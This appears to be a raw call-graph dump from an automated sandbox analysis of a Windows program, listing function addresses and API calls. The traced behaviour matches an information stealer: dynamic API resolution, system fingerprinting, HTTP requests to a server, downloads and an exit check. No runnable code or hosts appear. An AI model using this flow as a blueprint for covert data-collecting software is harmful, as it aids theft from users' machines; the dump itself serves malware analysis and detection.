14319 d3455e 14318->14319 14320 d345c0 2 API calls 14319->14320 14321 d34577 14320->14321 14322 d345c0 2 API calls 14321->14322 14323 d34590 14322->14323 14324 d345c0 2 API calls 14323->14324 14325 d345a9 14324->14325 14326 d49c10 14325->14326 14327 d4a036 8 API calls 14326->14327 14328 d49c20 43 API calls 14326->14328 14329 d4a146 14327->14329 14330 d4a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14327->14330 14328->14327 14331 d4a216 14329->14331 14332 d4a153 8 API calls 14329->14332 14330->14329 14333 d4a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14331->14333 14334 d4a298 14331->14334 14332->14331 14333->14334 14335 d4a2a5 6 API calls 14334->14335 14336 d4a337 14334->14336 14335->14336 14337 d4a344 9 API calls 14336->14337 14338 d4a41f 14336->14338 14337->14338 14339 d4a4a2 14338->14339 14340 d4a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14338->14340 14341 d4a4dc 14339->14341 14342 d4a4ab GetProcAddress GetProcAddress 14339->14342 14340->14339 14343 d4a515 14341->14343 14344 d4a4e5 GetProcAddress GetProcAddress 14341->14344 14342->14341 14345 d4a612 14343->14345 14346 d4a522 10 API calls 14343->14346 14344->14343 14347 d4a67d 14345->14347 14348 d4a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14345->14348 14346->14345 14349 d4a686 GetProcAddress 14347->14349 14350 d4a69e 14347->14350 14348->14347 14349->14350 14351 d4a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14350->14351 14352 d45ca3 14350->14352 14351->14352 14353 d31590 14352->14353 15474 d31670 14353->15474 14356 d4a7a0 lstrcpy 14357 d315b5 14356->14357 14358 d4a7a0 lstrcpy 14357->14358 14359 d315c7 14358->14359 14360 d4a7a0 lstrcpy 14359->14360 14361 d315d9 14360->14361 14362 d4a7a0 lstrcpy 14361->14362 14363 d31663 14362->14363 14364 d45510 14363->14364 14365 d45521 14364->14365 14366 d4a820 2 API calls 14365->14366 14367 d4552e 14366->14367 14368 d4a820 2 API calls 14367->14368 14369 d4553b 14368->14369 14370 d4a820 2 API calls 14369->14370 14371 d45548 14370->14371 14372 d4a740 lstrcpy 14371->14372 14373 d45555 14372->14373 14374 d4a740 lstrcpy 14373->14374 14375 d45562 14374->14375 14376 d4a740 lstrcpy 14375->14376 14377 d4556f 14376->14377 14378 d4a740 lstrcpy 14377->14378 14412 d4557c 14378->14412 14379 d4a820 lstrlen lstrcpy 14379->14412 14380 d4a740 lstrcpy 14380->14412 14381 d4a8a0 lstrcpy 14381->14412 14382 d45643 StrCmpCA 14382->14412 14383 d456a0 StrCmpCA 14384 d457dc 14383->14384 14383->14412 14385 d4a8a0 lstrcpy 14384->14385 14386 d457e8 14385->14386 14387 d4a820 2 API calls 14386->14387 14389 d457f6 14387->14389 14388 d451f0 20 API calls 14388->14412 14392 d4a820 2 API calls 14389->14392 14390 d45856 StrCmpCA 14391 d45991 14390->14391 14390->14412 14393 d4a8a0 lstrcpy 14391->14393 14394 d45805 14392->14394 14395 d4599d 14393->14395 14396 d31670 lstrcpy 14394->14396 14397 d4a820 2 API calls 14395->14397 14405 d45811 14396->14405 14400 d459ab 14397->14400 14398 d45a0b StrCmpCA 14401 d45a16 Sleep 14398->14401 14402 d45a28 14398->14402 14399 d452c0 25 API calls 14399->14412 14403 d4a820 2 API calls 14400->14403 14401->14412 14404 d4a8a0 lstrcpy 14402->14404 14406 d459ba 14403->14406 14408 d45a34 14404->14408 14405->13471 14407 d31670 lstrcpy 14406->14407 14407->14405 14409 d4a820 2 API calls 14408->14409 14410 d45a43 14409->14410 14411 d4a820 2 API calls 14410->14411 14413 d45a52 14411->14413 14412->14379 14412->14380 14412->14381 14412->14382 14412->14383 14412->14388 14412->14390 14412->14398 14412->14399 14414 d4578a StrCmpCA 14412->14414 14416 d4a7a0 lstrcpy 14412->14416 14417 d4593f StrCmpCA 14412->14417 14418 d31590 lstrcpy 14412->14418 14415 d31670 lstrcpy 14413->14415 14414->14412 14415->14405 14416->14412 14417->14412 14418->14412 14420 d47553 GetVolumeInformationA 14419->14420 14421 d4754c 14419->14421 14422 d47591 14420->14422 14421->14420 14423 d475fc GetProcessHeap RtlAllocateHeap 14422->14423 14424 d47628 wsprintfA 14423->14424 14425 d47619 14423->14425 14427 d4a740 lstrcpy 14424->14427 14426 d4a740 lstrcpy 14425->14426 14428 d45da7 14426->14428 14427->14428 14428->13492 14430 d4a7a0 lstrcpy 14429->14430 14431 d34899 14430->14431 15483 d347b0 14431->15483 14433 d348a5 14434 d4a740 lstrcpy 14433->14434 14435 d348d7 14434->14435 14436 d4a740 lstrcpy 14435->14436 14437 d348e4 14436->14437 14438 d4a740 lstrcpy 14437->14438 14439 d348f1 14438->14439 14440 d4a740 lstrcpy 14439->14440 14441 d348fe 14440->14441 14442 d4a740 lstrcpy 14441->14442 14443 d3490b InternetOpenA StrCmpCA 14442->14443 14444 d34944 14443->14444 14445 d34ecb InternetCloseHandle 14444->14445 15489 d48b60 14444->15489 14446 d34ee8 14445->14446 15504 d39ac0 CryptStringToBinaryA 14446->15504 14448 d34963 15497 d4a920 14448->15497 14451 d34976 14453 d4a8a0 lstrcpy 14451->14453 14458 d3497f 14453->14458 14454 d4a820 2 API calls 14455 d34f05 14454->14455 14457 d4a9b0 4 API calls 14455->14457 14456 d34f27 ctype 14460 d4a7a0 lstrcpy 14456->14460 14459 d34f1b 14457->14459 14462 d4a9b0 4 API calls 14458->14462 14461 d4a8a0 lstrcpy 14459->14461 14465 d34f57 14460->14465 14461->14456 14463 d349a9 14462->14463 14464 d4a8a0 lstrcpy 14463->14464 14466 d349b2 14464->14466 14465->13495 14467 d4a9b0 4 API calls 14466->14467 14468 d349d1 14467->14468 14469 d4a8a0 lstrcpy 14468->14469 14470 d349da 14469->14470 14471 d4a920 3 API calls 14470->14471 14472 d349f8 14471->14472 14473 d4a8a0 lstrcpy 14472->14473 14474 d34a01 14473->14474 14475 d4a9b0 4 API calls 14474->14475 14476 d34a20 14475->14476 14477 d4a8a0 lstrcpy 14476->14477 14478 d34a29 14477->14478 14479 d4a9b0 4 API calls 14478->14479 14480 d34a48 14479->14480 14481 d4a8a0 lstrcpy 14480->14481 14482 d34a51 14481->14482 14483 d4a9b0 4 API calls 14482->14483 14484 d34a7d 14483->14484 14485 d4a920 3 API calls 14484->14485 14486 d34a84 14485->14486 14487 d4a8a0 lstrcpy 14486->14487 14488 d34a8d 14487->14488 14489 d34aa3 InternetConnectA 14488->14489 14489->14445 14490 d34ad3 HttpOpenRequestA 14489->14490 14492 d34b28 14490->14492 14493 d34ebe InternetCloseHandle 14490->14493 14494 d4a9b0 4 API calls 14492->14494 14493->14445 14495 d34b3c 14494->14495 14496 d4a8a0 lstrcpy 14495->14496 14497 d34b45 14496->14497 14498 d4a920 3 API calls 14497->14498 14499 d34b63 14498->14499 14500 d4a8a0 lstrcpy 14499->14500 14501 d34b6c 14500->14501 14502 d4a9b0 4 API calls 14501->14502 14503 d34b8b 14502->14503 14504 d4a8a0 lstrcpy 14503->14504 14505 d34b94 14504->14505 14506 d4a9b0 4 API calls 14505->14506 14507 d34bb5 14506->14507 14508 d4a8a0 lstrcpy 14507->14508 14509 d34bbe 14508->14509 14510 d4a9b0 4 API calls 14509->14510 14511 d34bde 14510->14511 14512 d4a8a0 lstrcpy 14511->14512 14513 d34be7 14512->14513 14514 d4a9b0 4 API calls 14513->14514 14515 d34c06 14514->14515 14516 d4a8a0 lstrcpy 14515->14516 14517 d34c0f 14516->14517 14518 d4a920 3 API calls 14517->14518 14519 d34c2d 14518->14519 14520 d4a8a0 lstrcpy 14519->14520 14521 d34c36 14520->14521 14522 d4a9b0 4 API calls 14521->14522 14523 d34c55 14522->14523 14524 d4a8a0 lstrcpy 14523->14524 14525 d34c5e 14524->14525 14526 d4a9b0 4 API calls 14525->14526 14527 d34c7d 14526->14527 14528 d4a8a0 lstrcpy 14527->14528 14529 d34c86 14528->14529 14530 d4a920 3 API calls 14529->14530 14531 d34ca4 14530->14531 14532 d4a8a0 lstrcpy 14531->14532 14533 d34cad 14532->14533 14534 d4a9b0 4 API calls 14533->14534 14535 d34ccc 14534->14535 14536 d4a8a0 lstrcpy 14535->14536 14537 d34cd5 14536->14537 14538 d4a9b0 4 API calls 14537->14538 14539 d34cf6 14538->14539 14540 d4a8a0 lstrcpy 14539->14540 14541 d34cff 14540->14541 14542 d4a9b0 4 API calls 14541->14542 14543 d34d1f 14542->14543 14544 d4a8a0 lstrcpy 14543->14544 14545 d34d28 14544->14545 14546 d4a9b0 4 API calls 14545->14546 14547 d34d47 14546->14547 14548 d4a8a0 lstrcpy 14547->14548 14549 d34d50 14548->14549 14550 d4a920 3 API calls 14549->14550 14551 d34d6e 14550->14551 14552 d4a8a0 lstrcpy 14551->14552 14553 d34d77 14552->14553 14554 d4a740 lstrcpy 14553->14554 14555 d34d92 14554->14555 14556 d4a920 3 API calls 14555->14556 14557 d34db3 14556->14557 14558 d4a920 3 API calls 14557->14558 14559 d34dba 14558->14559 14560 d4a8a0 lstrcpy 14559->14560 14561 d34dc6 14560->14561 14562 d34de7 lstrlen 14561->14562 14563 d34dfa 14562->14563 14564 d34e03 lstrlen 14563->14564 15503 d4aad0 14564->15503 14566 d34e13 HttpSendRequestA 14567 d34e32 InternetReadFile 14566->14567 14568 d34e67 InternetCloseHandle 14567->14568 14573 d34e5e 14567->14573 14571 d4a800 14568->14571 14570 d4a9b0 4 API calls 14570->14573 14571->14493 14572 d4a8a0 lstrcpy 14572->14573 14573->14567 14573->14568 14573->14570 14573->14572 15510 d4aad0 14574->15510 14576 d417c4 StrCmpCA 14577 d417d7 14576->14577 14578 d417cf ExitProcess 14576->14578 14579 d419c2 14577->14579 14580 d41970 StrCmpCA 14577->14580 14581 d418f1 StrCmpCA 14577->14581 14582 d41951 StrCmpCA 14577->14582 14583 d41932 StrCmpCA 14577->14583 14584 d41913 StrCmpCA 14577->14584 14585 d4185d StrCmpCA 14577->14585 14586 d4187f StrCmpCA 14577->14586 14587 d418ad StrCmpCA 14577->14587 14588 d418cf StrCmpCA 14577->14588 14589 d4a820 lstrlen lstrcpy 14577->14589 14579->13497 14580->14577 14581->14577 14582->14577 14583->14577 14584->14577 14585->14577 14586->14577 14587->14577 14588->14577 14589->14577 14591 d4a7a0 lstrcpy 14590->14591 14592 d35979 14591->14592 14593 d347b0 2 API calls 14592->14593 14594 d35985 14593->14594 14595 d4a740 lstrcpy 14594->14595 14596 d359ba 14595->14596 14597 d4a740 lstrcpy 14596->14597 14598 d359c7 14597->14598 14599 d4a740 lstrcpy 14598->14599 14600 d359d4 14599->14600 14601 d4a740 lstrcpy 14600->14601 14602 d359e1 14601->14602 14603 d4a740 lstrcpy 14602->14603 14604 d359ee InternetOpenA StrCmpCA 14603->14604 14605 d35a1d 14604->14605 14606 d35fc3 InternetCloseHandle 14605->14606 14608 d48b60 3 API calls 14605->14608 14607 d35fe0 14606->14607 14610 d39ac0 4 API calls 14607->14610 14609 d35a3c 14608->14609 14611 d4a920 3 API calls 14609->14611 14613 d35fe6 14610->14613 14612 d35a4f 14611->14612 14614 d4a8a0 lstrcpy 14612->14614 14615 d4a820 2 API calls 14613->14615 14617 d3601f ctype 14613->14617 14619 d35a58 14614->14619 14616 d35ffd 14615->14616 14618 d4a9b0 4 API calls 14616->14618 14621 d4a7a0 lstrcpy 14617->14621 14620 d36013 14618->14620 14623 d4a9b0 4 API calls 14619->14623 14622 d4a8a0 lstrcpy 14620->14622 14632 d3604f 14621->14632 14622->14617 14624 d35a82 14623->14624 14625 d4a8a0 lstrcpy 14624->14625 14626 d35a8b 14625->14626 14627 d4a9b0 4 API calls 14626->14627 14628 d35aaa 14627->14628 14629 d4a8a0 lstrcpy 14628->14629 14630 d35ab3 14629->14630 14631 d4a920 3 API calls 14630->14631 14633 d35ad1 14631->14633 14632->13503 14634 d4a8a0 lstrcpy 14633->14634 14635 d35ada 14634->14635 14636 d4a9b0 4 API calls 14635->14636 14637 d35af9 14636->14637 14638 d4a8a0 lstrcpy 14637->14638 14639 d35b02 14638->14639 14640 d4a9b0 4 API calls 14639->14640 14641 d35b21 14640->14641 14642 d4a8a0 lstrcpy 14641->14642 14643 d35b2a 14642->14643 14644 d4a9b0 4 API calls 14643->14644 14645 d35b56 14644->14645 14646 d4a920 3 API calls 14645->14646 14647 d35b5d 14646->14647 14648 d4a8a0 lstrcpy 14647->14648 14649 d35b66 14648->14649 14650 d35b7c InternetConnectA 14649->14650 14650->14606 14651 d35bac HttpOpenRequestA 14650->14651 14653 d35fb6 InternetCloseHandle 14651->14653 14654 d35c0b 14651->14654 14653->14606 14655 d4a9b0 4 API calls 14654->14655 14656 d35c1f 14655->14656 14657 d4a8a0 lstrcpy 14656->14657 14658 d35c28 14657->14658 14659 d4a920 3 API calls 14658->14659 14660 d35c46 14659->14660 14661 d4a8a0 lstrcpy 14660->14661 14662 d35c4f 14661->14662 14663 d4a9b0 4 API calls 14662->14663 14664 d35c6e 14663->14664 14665 d4a8a0 lstrcpy 14664->14665 14666 d35c77 14665->14666 14667 d4a9b0 4 API calls 14666->14667 14668 d35c98 14667->14668 14669 d4a8a0 lstrcpy 14668->14669 14670 d35ca1 14669->14670 14671 d4a9b0 4 API calls 14670->14671 14672 d35cc1 14671->14672 14673 d4a8a0 lstrcpy 14672->14673 14674 d35cca 14673->14674 14675 d4a9b0 4 API calls 14674->14675 14676 d35ce9 14675->14676 14677 d4a8a0 lstrcpy 14676->14677 14678 d35cf2 14677->14678 14679 d4a920 3 API calls 14678->14679 14680 d35d10 14679->14680 14681 d4a8a0 lstrcpy 14680->14681 14682 d35d19 14681->14682 14683 d4a9b0 4 API calls 14682->14683 14684 d35d38 14683->14684 14685 d4a8a0 lstrcpy 14684->14685 14686 d35d41 14685->14686 14687 d4a9b0 4 API calls 14686->14687 14688 d35d60 14687->14688 14689 d4a8a0 lstrcpy 14688->14689 14690 d35d69 14689->14690 14691 d4a920 3 API calls 14690->14691 14692 d35d87 14691->14692 14693 d4a8a0 lstrcpy 14692->14693 14694 d35d90 14693->14694 14695 d4a9b0 4 API calls 14694->14695 14696 d35daf 14695->14696 14697 d4a8a0 lstrcpy 14696->14697 14698 d35db8 14697->14698 14699 d4a9b0 4 API calls 14698->14699 14700 d35dd9 14699->14700 14701 d4a8a0 lstrcpy 14700->14701 14702 d35de2 14701->14702 14703 d4a9b0 4 API calls 14702->14703 14704 d35e02 14703->14704 14705 d4a8a0 lstrcpy 14704->14705 14706 d35e0b 14705->14706 14707 d4a9b0 4 API calls 14706->14707 14708 d35e2a 14707->14708 14709 d4a8a0 lstrcpy 14708->14709 14710 d35e33 14709->14710 14711 d4a920 3 API calls 14710->14711 14712 d35e54 14711->14712 14713 d4a8a0 lstrcpy 14712->14713 14714 d35e5d 14713->14714 14715 d35e70 lstrlen 14714->14715 15511 d4aad0 14715->15511 14717 d35e81 lstrlen GetProcessHeap RtlAllocateHeap 15512 d4aad0 14717->15512 14719 d35eae lstrlen 14720 d35ebe 14719->14720 14721 d35ed7 lstrlen 14720->14721 14722 d35ee7 14721->14722 14723 d35ef0 lstrlen 14722->14723 14724 d35f03 14723->14724 14725 d35f1a lstrlen 14724->14725 15513 d4aad0 14725->15513 14727 d35f2a HttpSendRequestA 14728 d35f35 InternetReadFile 14727->14728 14729 d35f6a InternetCloseHandle 14728->14729 14733 d35f61 14728->14733 14729->14653 14731 d4a9b0 4 API calls 14731->14733 14732 d4a8a0 lstrcpy 14732->14733 14733->14728 14733->14729 14733->14731 14733->14732 14735 d41077 14734->14735 14736 d41151 14735->14736 14737 d4a820 lstrlen lstrcpy 14735->14737 14736->13505 14737->14735 14739 d40db7 14738->14739 14740 d40f17 14739->14740 14741 d40ea4 StrCmpCA 14739->14741 14742 d40e27 StrCmpCA 14739->14742 14743 d40e67 StrCmpCA 14739->14743 14744 d4a820 lstrlen lstrcpy 14739->14744 14740->13513 14741->14739 14742->14739 14743->14739 14744->14739 14749 d40f67 14745->14749 14746 d41044 14746->13521 14747 d40fb2 StrCmpCA 14747->14749 14748 d4a820 lstrlen lstrcpy 14748->14749 14749->14746 14749->14747 14749->14748 14751 d4a740 lstrcpy 14750->14751 14752 d41a26 14751->14752 14753 d4a9b0 4 API calls 14752->14753 14754 d41a37 14753->14754 14755 d4a8a0 lstrcpy 14754->14755 14756 d41a40 14755->14756 14757 d4a9b0 4 API calls 14756->14757 14758 d41a5b 14757->14758 14759 d4a8a0 lstrcpy 14758->14759 14760 d41a64 14759->14760 14761 d4a9b0 4 API calls 14760->14761 14762 d41a7d 14761->14762 14763 d4a8a0 lstrcpy 14762->14763 14764 d41a86 14763->14764 14765 d4a9b0 4 API calls 14764->14765 14766 d41aa1 14765->14766 14767 d4a8a0 lstrcpy 14766->14767 14768 d41aaa 14767->14768 14769 d4a9b0 4 API calls 14768->14769 14770 d41ac3 14769->14770 14771 d4a8a0 lstrcpy 14770->14771 14772 d41acc 14771->14772 14773 d4a9b0 4 API calls 14772->14773 14774 d41ae7 14773->14774 14775 d4a8a0 lstrcpy 14774->14775 14776 d41af0 14775->14776 14777 d4a9b0 4 API calls 14776->14777 14778 d41b09 14777->14778 14779 d4a8a0 lstrcpy 14778->14779 14780 d41b12 14779->14780 14781 d4a9b0 4 API calls 14780->14781 14782 d41b2d 14781->14782 14783 d4a8a0 lstrcpy 14782->14783 14784 d41b36 14783->14784 14785 d4a9b0 4 API calls 14784->14785 14786 d41b4f 14785->14786 14787 d4a8a0 lstrcpy 14786->14787 14788 d41b58 14787->14788 14789 d4a9b0 4 API calls 14788->14789 14790 d41b76 14789->14790 14791 d4a8a0 lstrcpy 14790->14791 14792 d41b7f 14791->14792 14793 d47500 6 API calls 14792->14793 14794 d41b96 14793->14794 14795 d4a920 3 API calls 14794->14795 14796 d41ba9 14795->14796 14797 d4a8a0 lstrcpy 14796->14797 14798 d41bb2 14797->14798 14799 d4a9b0 4 API calls 14798->14799 14800 d41bdc 14799->14800 14801 d4a8a0 lstrcpy 14800->14801 14802 d41be5 14801->14802 14803 d4a9b0 4 API calls 14802->14803 14804 d41c05 14803->14804 14805 d4a8a0 lstrcpy 14804->14805 14806 d41c0e 14805->14806 15514 d47690 GetProcessHeap RtlAllocateHeap 14806->15514 14809 d4a9b0 4 API calls 14810 d41c2e 14809->14810 14811 d4a8a0 lstrcpy 14810->14811 14812 d41c37 14811->14812 14813 d4a9b0 4 API calls 14812->14813 14814 d41c56 14813->14814 14815 d4a8a0 lstrcpy 14814->14815 14816 d41c5f 14815->14816 14817 d4a9b0 4 API calls 14816->14817 14818 d41c80 14817->14818 14819 d4a8a0 lstrcpy 14818->14819 14820 d41c89 14819->14820 15521 d477c0 GetCurrentProcess IsWow64Process 14820->15521 14823 d4a9b0 4 API calls 14824 d41ca9 14823->14824 14825 d4a8a0 lstrcpy 14824->14825 14826 d41cb2 14825->14826 14827 d4a9b0 4 API calls 14826->14827 14828 d41cd1 14827->14828 14829 d4a8a0 lstrcpy 14828->14829 14830 d41cda 14829->14830 14831 d4a9b0 4 API calls 14830->14831 14832 d41cfb 14831->14832 14833 d4a8a0 lstrcpy 14832->14833 14834 d41d04 14833->14834 14835 d47850 3 API calls 14834->14835 14836 d41d14 14835->14836 14837 d4a9b0 4 API calls 14836->14837 14838 d41d24 14837->14838 14839 d4a8a0 lstrcpy 14838->14839 14840 d41d2d 14839->14840 14841 d4a9b0 4 API calls 14840->14841 14842 d41d4c 14841->14842 14843 d4a8a0 lstrcpy 14842->14843 14844 d41d55 14843->14844 14845 d4a9b0 4 API calls 14844->14845 14846 d41d75 14845->14846 14847 d4a8a0 lstrcpy 14846->14847 14848 d41d7e 14847->14848 14849 d478e0 3 API calls 14848->14849 14850 d41d8e 14849->14850 14851 d4a9b0 4 API calls 14850->14851 14852 d41d9e 14851->14852 14853 d4a8a0 lstrcpy 14852->14853 14854 d41da7 14853->14854 14855 d4a9b0 4 API calls 14854->14855 14856 d41dc6 14855->14856 14857 d4a8a0 lstrcpy 14856->14857 14858 d41dcf 14857->14858 14859 d4a9b0 4 API calls 14858->14859 14860 d41df0 14859->14860 14861 d4a8a0 lstrcpy 14860->14861 14862 d41df9 14861->14862 15523 d47980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14862->15523 14865 d4a9b0 4 API calls 14866 d41e19 14865->14866 14867 d4a8a0 lstrcpy 14866->14867 14868 d41e22 14867->14868 14869 d4a9b0 4 API calls 14868->14869 14870 d41e41 14869->14870 14871 d4a8a0 lstrcpy 14870->14871 14872 d41e4a 14871->14872 14873 d4a9b0 4 API calls 14872->14873 14874 d41e6b 14873->14874 14875 d4a8a0 lstrcpy 14874->14875 14876 d41e74 14875->14876 15525 d47a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14876->15525 14879 d4a9b0 4 API calls 14880 d41e94 14879->14880 14881 d4a8a0 lstrcpy 14880->14881 14882 d41e9d 14881->14882 14883 d4a9b0 4 API calls 14882->14883 14884 d41ebc 14883->14884 14885 d4a8a0 lstrcpy 14884->14885 14886 d41ec5 14885->14886 14887 d4a9b0 4 API calls 14886->14887 14888 d41ee5 14887->14888 14889 d4a8a0 lstrcpy 14888->14889 14890 d41eee 14889->14890 15528 d47b00 GetUserDefaultLocaleName 14890->15528 14893 d4a9b0 4 API calls 14894 d41f0e 14893->14894 14895 d4a8a0 lstrcpy 14894->14895 14896 d41f17 14895->14896 14897 d4a9b0 4 API calls 14896->14897 14898 d41f36 14897->14898 14899 d4a8a0 lstrcpy 14898->14899 14900 d41f3f 14899->14900 14901 d4a9b0 4 API calls 14900->14901 14902 d41f60 14901->14902 14903 d4a8a0 lstrcpy 14902->14903 14904 d41f69 14903->14904 15532 d47b90 14904->15532 14906 d41f80 14907 d4a920 3 API calls 14906->14907 14908 d41f93 14907->14908 14909 d4a8a0 lstrcpy 14908->14909 14910 d41f9c 14909->14910 14911 d4a9b0 4 API calls 14910->14911 14912 d41fc6 14911->14912 14913 d4a8a0 lstrcpy 14912->14913 14914 d41fcf 14913->14914 14915 d4a9b0 4 API calls 14914->14915 14916 d41fef 14915->14916 14917 d4a8a0 lstrcpy 14916->14917 14918 d41ff8 14917->14918 15544 d47d80 GetSystemPowerStatus 14918->15544 14921 d4a9b0 4 API calls 14922 d42018 14921->14922 14923 d4a8a0 lstrcpy 14922->14923 14924 d42021 14923->14924 14925 d4a9b0 4 API calls 14924->14925 14926 d42040 14925->14926 14927 d4a8a0 lstrcpy 14926->14927 14928 d42049 14927->14928 14929 d4a9b0 4 API calls 14928->14929 14930 d4206a 14929->14930 14931 d4a8a0 lstrcpy 14930->14931 14932 d42073 14931->14932 14933 d4207e GetCurrentProcessId 14932->14933 15546 d49470 OpenProcess 14933->15546 14936 d4a920 3 API calls 14937 d420a4 14936->14937 14938 d4a8a0 lstrcpy 14937->14938 14939 d420ad 14938->14939 14940 d4a9b0 4 API calls 14939->14940 14941 d420d7 14940->14941 14942 d4a8a0 lstrcpy 14941->14942 14943 d420e0 14942->14943 14944 d4a9b0 4 API calls 14943->14944 14945 d42100 14944->14945 14946 d4a8a0 lstrcpy 14945->14946 14947 d42109 14946->14947 15551 d47e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14947->15551 14950 d4a9b0 4 API calls 14951 d42129 14950->14951 14952 d4a8a0 lstrcpy 14951->14952 14953 d42132 14952->14953 14954 d4a9b0 4 API calls 14953->14954 14955 d42151 14954->14955 14956 d4a8a0 lstrcpy 14955->14956 14957 d4215a 14956->14957 14958 d4a9b0 4 API calls 14957->14958 14959 d4217b 14958->14959 14960 d4a8a0 lstrcpy 14959->14960 14961 d42184 14960->14961 15555 d47f60 14961->15555 14964 d4a9b0 4 API calls 14965 d421a4 14964->14965 14966 d4a8a0 lstrcpy 14965->14966 14967 d421ad 14966->14967 14968 d4a9b0 4 API calls 14967->14968 14969 d421cc 14968->14969 14970 d4a8a0 lstrcpy 14969->14970 14971 d421d5 14970->14971 14972 d4a9b0 4 API calls 14971->14972 14973 d421f6 14972->14973 14974 d4a8a0 lstrcpy 14973->14974 14975 d421ff 14974->14975 15568 d47ed0 GetSystemInfo wsprintfA 14975->15568 14978 d4a9b0 4 API calls 14979 d4221f 14978->14979 14980 d4a8a0 lstrcpy 14979->14980 14981 d42228 14980->14981 14982 d4a9b0 4 API calls 14981->14982 14983 d42247 14982->14983 14984 d4a8a0 lstrcpy 14983->14984 14985 d42250 14984->14985 14986 d4a9b0 4 API calls 14985->14986 14987 d42270 14986->14987 14988 d4a8a0 lstrcpy 14987->14988 14989 d42279 14988->14989 15570 d48100 GetProcessHeap RtlAllocateHeap 14989->15570 14992 d4a9b0 4 API calls 14993 d42299 14992->14993 14994 d4a8a0 lstrcpy 14993->14994 14995 d422a2 14994->14995 14996 d4a9b0 4 API calls 14995->14996 14997 d422c1 14996->14997 14998 d4a8a0 lstrcpy 14997->14998 14999 d422ca 14998->14999 15000 d4a9b0 4 API calls 14999->15000 15001 d422eb 15000->15001 15002 d4a8a0 lstrcpy 15001->15002 15003 d422f4 15002->15003 15576 d487c0 15003->15576 15006 d4a920 3 API calls 15007 d4231e 15006->15007 15008 d4a8a0 lstrcpy 15007->15008 15009 d42327 15008->15009 15010 d4a9b0 4 API calls 15009->15010 15011 d42351 15010->15011 15012 d4a8a0 lstrcpy 15011->15012 15013 d4235a 15012->15013 15014 d4a9b0 4 API calls 15013->15014 15015 d4237a 15014->15015 15016 d4a8a0 lstrcpy 15015->15016 15017 d42383 15016->15017 15018 d4a9b0 4 API calls 15017->15018 15019 d423a2 15018->15019 15020 d4a8a0 lstrcpy 15019->15020 15021 d423ab 15020->15021 15581 d481f0 15021->15581 15023 d423c2 15024 d4a920 3 API calls 15023->15024 15025 d423d5 15024->15025 15026 d4a8a0 lstrcpy 15025->15026 15027 d423de 15026->15027 15028 d4a9b0 4 API calls 15027->15028 15029 d4240a 15028->15029 15030 d4a8a0 lstrcpy 15029->15030 15031 d42413 15030->15031 15032 d4a9b0 4 API calls 15031->15032 15033 d42432 15032->15033 15034 d4a8a0 lstrcpy 15033->15034 15035 d4243b 15034->15035 15036 d4a9b0 4 API calls 15035->15036 15037 d4245c 15036->15037 15038 d4a8a0 lstrcpy 15037->15038 15039 d42465 15038->15039 15040 d4a9b0 4 API calls 15039->15040 15041 d42484 15040->15041 15042 d4a8a0 lstrcpy 15041->15042 15043 d4248d 15042->15043 15044 d4a9b0 4 API calls 15043->15044 15045 d424ae 15044->15045 15046 d4a8a0 lstrcpy 15045->15046 15047 d424b7 15046->15047 15589 d48320 15047->15589 15049 d424d3 15050 d4a920 3 API calls 15049->15050 15051 d424e6 15050->15051 15052 d4a8a0 lstrcpy 15051->15052 15053 d424ef 15052->15053 15054 d4a9b0 4 API calls 15053->15054 15055 d42519 15054->15055 15056 d4a8a0 lstrcpy 15055->15056 15057 d42522 15056->15057 15058 d4a9b0 4 API calls 15057->15058 15059 d42543 15058->15059 15060 d4a8a0 lstrcpy 15059->15060 15061 d4254c 15060->15061 15062 d48320 17 API calls 15061->15062 15063 d42568 15062->15063 15064 d4a920 3 API calls 15063->15064 15065 d4257b 15064->15065 15066 d4a8a0 lstrcpy 15065->15066 15067 d42584 15066->15067 15068 d4a9b0 4 API calls 15067->15068 15069 d425ae 15068->15069 15070 d4a8a0 lstrcpy 15069->15070 15071 d425b7 15070->15071 15072 d4a9b0 4 API calls 15071->15072 15073 d425d6 15072->15073 15074 d4a8a0 lstrcpy 15073->15074 15075 d425df 15074->15075 15076 d4a9b0 4 API calls 15075->15076 15077 d42600 15076->15077 15078 d4a8a0 lstrcpy 15077->15078 15079 d42609 15078->15079 15625 d48680 15079->15625 15081 d42620 15082 d4a920 3 API calls 15081->15082 15083 d42633 15082->15083 15084 d4a8a0 lstrcpy 15083->15084 15085 d4263c 15084->15085 15086 d4265a lstrlen 15085->15086 15087 d4266a 15086->15087 15088 d4a740 lstrcpy 15087->15088 15089 d4267c 15088->15089 15090 d31590 lstrcpy 15089->15090 15091 d4268d 15090->15091 15635 d45190 15091->15635 15093 d42699 15093->13525 15823 d4aad0 15094->15823 15096 d35009 InternetOpenUrlA 15097 d35021 15096->15097 15098 d350a0 InternetCloseHandle InternetCloseHandle 15097->15098 15099 d3502a InternetReadFile 15097->15099 15100 d350ec 15098->15100 15099->15097 15100->13529 15824 d398d0 15101->15824 15103 d40759 15104 d4077d 15103->15104 15105 d40a38 15103->15105 15108 d40799 StrCmpCA 15104->15108 15106 d31590 lstrcpy 15105->15106 15107 d40a49 15106->15107 16000 d40250 15107->16000 15110 d407a8 15108->15110 15136 d40843 15108->15136 15112 d4a7a0 lstrcpy 15110->15112 15114 d407c3 15112->15114 15113 d40865 StrCmpCA 15115 d40874 15113->15115 15153 d4096b 15113->15153 15116 d31590 lstrcpy 15114->15116 15117 d4a740 lstrcpy 15115->15117 15118 d4080c 15116->15118 15120 d40881 15117->15120 15121 d4a7a0 lstrcpy 15118->15121 15119 d4099c StrCmpCA 15122 d409ab 15119->15122 15142 d40a2d 15119->15142 15123 d4a9b0 4 API calls 15120->15123 15124 d40823 15121->15124 15125 d31590 lstrcpy 15122->15125 15126 d408ac 15123->15126 15127 d4a7a0 lstrcpy 15124->15127 15128 d409f4 15125->15128 15129 d4a920 3 API calls 15126->15129 15130 d4083e 15127->15130 15131 d4a7a0 lstrcpy 15128->15131 15132 d408b3 15129->15132 15827 d3fb00 15130->15827 15134 d40a0d 15131->15134 15135 d4a9b0 4 API calls 15132->15135 15137 d4a7a0 lstrcpy 15134->15137 15138 d408ba 15135->15138 15136->15113 15139 d40a28 15137->15139 15140 d4a8a0 lstrcpy 